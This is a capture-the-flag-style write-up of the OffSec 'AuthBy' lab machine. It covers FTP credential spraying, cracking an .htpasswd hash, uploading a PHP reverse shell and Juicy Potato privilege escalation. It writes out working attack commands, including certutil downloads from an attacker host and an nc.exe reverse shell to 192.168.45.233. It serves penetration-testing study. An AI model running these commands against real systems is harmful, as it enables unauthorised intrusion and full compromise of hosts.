OffSec Proving Grounds Practice - AuthBy Writeup
This is my writeup for AuthBy, a Windows machine from OffSec Proving Grounds Practice.
I found this machine quite useful because the attack path was not just about scanning and running a public exploit. The chain started from FTP enumeration, moved into credential discovery, then web access, initial foothold through a PHP reverse shell, and finally Windows privilege escalation.
The overall attack path was:
- Run initial port and service enumeration with Nmap
- Discover anonymous FTP access
- Perform FTP credential spraying and find weak credentials
- Log in to FTP as admin and read
.htpasswd - Crack the Apache htpasswd hash with John
- Use the cracked credential to access the HTTP Basic Auth service
- Upload a PHP reverse shell and gain an initial foothold
- Enumerate Windows privileges and find
SeImpersonatePrivilege - Use Juicy Potato for privilege escalation
- Gain a high-privilege shell
Target
Target IP: 192.168.138.46
1. Initial Enumeration
I started with a full TCP port scan and service detection:
nmap -Pn -p- -A -T5 192.168.138.46
The scan showed three interesting open ports:
21/tcp open ftp zFTPServer 6.0
242/tcp open http Apache httpd 2.2.21 (Win32) PHP/5.3.8
3389/tcp open ms-wbt-server Microsoft Terminal Service
Important observations:
21/tcp ftp
Anonymous FTP login allowed
242/tcp http
HTTP Basic Authentication required
Apache/2.2.21 (Win32) PHP/5.3.8
3389/tcp rdp
Microsoft Terminal Service
Windows Server 2008 / Windows 7 era
From the scan result, the machine looked like an older Windows host running FTP, Apache, PHP, and RDP.
The HTTP service on port 242 required Basic Authentication, so I could not access the web content directly at this stage.
The first obvious lead was the FTP service because anonymous login was allowed.
2. FTP Anonymous Enumeration
I first tried to log in to FTP anonymously:
ftp 192.168.138.46
After logging in anonymously, I could see zFTPServer-related files and directories:
zFTPServer.exe
Settings.ini
accounts/
log/
extensions/
certificates/
This revealed a few useful details:
- The FTP service was running zFTPServer
- There was an
accountsdirectory - A
Settings.inifile existed - FTP might contain service configuration files or credentials
However, the anonymous user had limited access. Because of that, I moved on to test weak FTP credentials.
3. FTP Credential Spraying
I created a small username list:
echo 'Offsec' >> usernames.txt
echo 'admin' >> usernames.txt
Then I used Hydra to test FTP credentials:
hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Usernames/xato-net-10-million-passwords.txt 192.168.138.46 ftp
Hydra found a valid FTP credential:
[21][ftp] host: 192.168.138.46 login: admin password: admin
This was a simple but important finding.
Default or weak credentials are always worth checking, especially on services like FTP, Tomcat, Jenkins, phpMyAdmin, SMB, and other administrative portals.
4. Log In to FTP as Admin
I logged in to FTP using the discovered credential:
ftp 192.168.138.46
Credentials:
Username: admin
Password: admin
After logging in as admin, I had access to more files.
One important file was .htpasswd:
less .htpasswd
The file contained the following Apache htpasswd hash:
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
This was interesting because the web service on port 242 was protected by HTTP Basic Authentication. Therefore, this hash was likely related to the web login.
5. Crack the .htpasswd Hash
I saved the hash into a file:
echo 'offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > offsec.txt
Then I used John to crack it:
john --wordlist=/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt offsec.txt
John successfully cracked the password:
elite (offsec)
So the HTTP Basic Auth credential was:
Username: offsec
Password: elite
6. Test HTTP Basic Auth
I tested the credential against the HTTP service on port 242:
curl -u 'offsec:elite' -X GET http://192.168.138.46:242
The credential worked, confirming that the .htpasswd file from FTP was being used for HTTP Basic Authentication.
At this point, the attack path became much clearer:
FTP weak credential -> read .htpasswd -> crack web credential -> access web service
7. Test FTP Upload
Since I had FTP admin access, I tested whether I could upload files:
put usernames.txt
The upload worked.
This was a critical point in the attack chain. If the FTP directory was mapped to the web root, and the web server supported PHP, then uploading a PHP file could lead to remote code execution.
The idea was:
FTP write access + Apache/PHP web server = potential web shell upload
8. Upload a PHP Reverse Shell
I prepared a PHP reverse shell and modified the listener IP and port:
LHOST: 192.168.45.233
LPORT: 4444
Then I uploaded it through FTP:
put payload.php
On Kali, I started a Netcat listener:
nc -lvnp 4444
Then I triggered the PHP shell through the web service:
curl -u 'offsec:elite' http://192.168.138.46:242/payload.php
After triggering the file, I received a reverse shell.
9. Initial Foothold
After getting a shell, I started with basic checks:
hostname
whoami
echo %USERNAME%
The shell was running as a web server-related user, such as:
apache
At this stage, I did not want to spend too much time on repetitive enumeration. The main goal was to identify:
- Current user context
- Operating system version
- User privileges
- Possible privilege escalation paths
10. Windows Enumeration
Check User Privileges
I checked the current user’s privileges:
whoami /priv
One privilege immediately stood out:
SeImpersonatePrivilege
This was important because on older Windows systems, service accounts with SeImpersonatePrivilege are often vulnerable to Potato-style privilege escalation techniques.
Check System Version
I checked the system information:
systeminfo
To reduce noise, this command can also be used:
systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
Based on both Nmap and system enumeration, the target appeared to be an older Windows Server / Windows 7-era system.
Check Useful Paths
Because Apache was running on Windows with PHP support, I checked the Apache directory:
cd C:\wamp\bin\apache\Apache2.2.21
dir
I needed a writable and executable location to upload tools such as nc.exe and Juicy.Potato.x86.exe.
11. Privilege Escalation Idea
At this point, the conditions were:
User: apache / web service user
Privilege: SeImpersonatePrivilege
OS: older Windows Server
Architecture: likely x86
This made Juicy Potato a reasonable privilege escalation technique to try.
Juicy Potato abuses Windows COM service behavior and token impersonation. If the service account has SeImpersonatePrivilege, it may be possible to obtain a higher-privilege shell.
12. Transfer Juicy Potato and nc.exe
On Kali, I started a Python HTTP server:
python3 -m http.server 80
On the target, I used certutil to download Juicy Potato:
certutil -urlcache -f http://192.168.45.233/Juicy.Potato.x86.exe Juicy.Potato.x86.exe
Then I downloaded nc.exe:
certutil -urlcache -f http://192.168.45.233/nc.exe nc.exe
I confirmed that the files were successfully downloaded:
dir
13. Select a CLSID
For Juicy Potato, I needed a working CLSID for the target Windows version.
I used the following TrustedInstaller CLSID:
{3c6859ce-230b-48a4-be6c-932c0c202048}
If one CLSID does not work, it is worth trying other CLSIDs that match the target operating system. Potato-style privilege escalation can depend heavily on OS version, available services, and CLSID behavior.
14. Execute Juicy Potato
On Kali, I started another listener:
nc -lvnp 1337
Then I executed Juicy Potato on the target:
Juicy.Potato.x86.exe -t * -p c:\windows\system32\cmd.exe -a "/c C:\wamp\bin\apache\Apache2.2.21\nc.exe 192.168.45.233 1337 -e cmd.exe" -l 1337 -c "{3c6859ce-230b-48a4-be6c-932c0c202048}"
After execution, I received another shell on my listener.
I confirmed the privilege level:
whoami
If successful, the result should show a high-privilege context such as:
nt authority\system
15. Attack Chain Summary
The complete attack chain was:
Nmap scan
↓
FTP anonymous enumeration
↓
FTP credential spraying
↓
Found admin:admin
↓
Log in to FTP as admin
↓
Read .htpasswd
↓
Crack htpasswd hash with John
↓
Found offsec:elite
↓
Log in to HTTP Basic Auth
↓
Upload PHP reverse shell through FTP
↓
Get shell as Apache user
↓
Find SeImpersonatePrivilege
↓
Upload Juicy Potato and nc.exe
↓
Exploit token impersonation
↓
Get high-privilege shell
16. Key Takeaways
1. FTP Enumeration Can Lead to Web Access
At first, anonymous FTP access may not look very dangerous. However, if FTP is misconfigured or linked to the web root, it can become the starting point of a full compromise.
In this machine, the chain started from FTP and eventually led to web access.
2. Weak Credentials Are Still Critical
The credential admin:admin is very basic, but weak and default credentials still appear in real environments.
During a penetration test, it is reasonable to check for default or weak credentials on services such as:
- FTP
- SSH
- SMB
- RDP
- Tomcat
- Jenkins
- phpMyAdmin
- Web admin panels
Of course, in a real engagement, this must be done carefully within scope and with attention to rate limits and account lockout policies.
3. .htpasswd Is Sensitive
The .htpasswd file did not contain a plaintext password, but it still exposed a crackable password hash.
After cracking the hash, I obtained:
offsec:elite
That credential was enough to access the HTTP Basic Auth-protected service.
4. FTP Write Access + PHP Is Dangerous
If an FTP directory is mapped to a web-accessible directory and the web server executes PHP, then file upload can become remote code execution.
This is a common misconfiguration pattern:
Writable FTP directory + executable web directory = RCE
5. SeImpersonatePrivilege Is a Strong Privilege Escalation Signal
When I saw this privilege:
SeImpersonatePrivilege
I immediately considered Potato-style privilege escalation techniques, such as:
- Juicy Potato
- Rotten Potato
- PrintSpoofer
- RoguePotato
- GodPotato
Because this target was an older Windows Server, Juicy Potato was a suitable option.
17. Reflection
AuthBy was a good machine for practicing a basic but complete Windows web attack chain.
The most important lesson for me was not only Juicy Potato, but the earlier chain of credential exposure and service relationship mapping:
FTP credential -> .htpasswd -> Web credential -> PHP shell
This felt realistic because many compromises do not happen from one single impressive exploit. Instead, several small weaknesses are chained together:
- Overly exposed FTP access
- Weak credentials
- Sensitive file exposure
- Writable web root
- Over-privileged service account
This machine reminded me not to only scan ports and search for exploits. I should always think about how different services are connected.
When I see FTP and a web server running on the same target, I should always ask:
Can files uploaded through FTP be accessed or executed through the web server?
That mindset is useful for both web penetration testing and Windows enumeration.
Commands Reference
Nmap
nmap -Pn -p- -A -T5 192.168.138.46
Hydra FTP Spraying
hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Usernames/xato-net-10-million-passwords.txt 192.168.138.46 ftp
John Crack htpasswd
echo 'offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > offsec.txt
john --wordlist=/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt offsec.txt
Test HTTP Basic Auth
curl -u 'offsec:elite' -X GET http://192.168.138.46:242
File Transfer from Kali
python3 -m http.server 80
certutil -urlcache -f http://192.168.45.233/Juicy.Potato.x86.exe Juicy.Potato.x86.exe
certutil -urlcache -f http://192.168.45.233/nc.exe nc.exe
Juicy Potato
Juicy.Potato.x86.exe -t * -p c:\windows\system32\cmd.exe -a "/c C:\wamp\bin\apache\Apache2.2.21\nc.exe 192.168.45.233 1337 -e cmd.exe" -l 1337 -c "{3c6859ce-230b-48a4-be6c-932c0c202048}"